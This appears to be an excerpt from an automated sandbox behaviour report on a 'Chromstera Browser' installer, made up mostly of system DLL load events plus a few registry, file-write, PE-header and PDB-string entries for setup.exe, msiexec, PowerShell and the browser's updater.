                      Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: version.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: davhlpr.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: lpk.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: msihnd.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Installer\MSI4739.tmpSection loaded: msi.dll
                      Source: C:\Windows\Installer\MSI4739.tmpSection loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile written: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.iniJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Chromstera Browser 1.0.0.0Jump to behavior
                      Source: setup.exeStatic PE information: certificate valid
                      Source: setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: setup.exeStatic file information: File size 9454152 > 1048576
                      Source: setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x26ae00
                      Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wininet.pdb source: setup.exe, 00000000.00000003.1719958497.0000000005251000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000003.00000003.1746421738.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, shi3105.tmp.0.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbR source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdbg source: setup.exe, MSIEC26.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: n.pdb" source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 31bf3856ad364e35corlib.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E2D6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\Updater.pdb source: ChromsteraUpdater.exe, 00000008.00000000.1793999764.00000000001A8000.00000002.00000001.01000000.0000000C.sdmp, ChromsteraUpdater.exe, 00000008.00000002.1810635597.00000000001A8000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbR source: powershell.exe, 00000006.00000002.1833673011.000002526E2D6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdbC source: setup.exe, MSI4739.tmp.1.dr, MSIFB77.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbfi source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000006.00000002.1831930535.000002526E104000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: setup.exe, Chromnius-Main.msi.0.dr
                      Source: Binary string: on.pdb source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089q8 source: powershell.exe, 00000006.00000002.1831930535.000002526E104000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
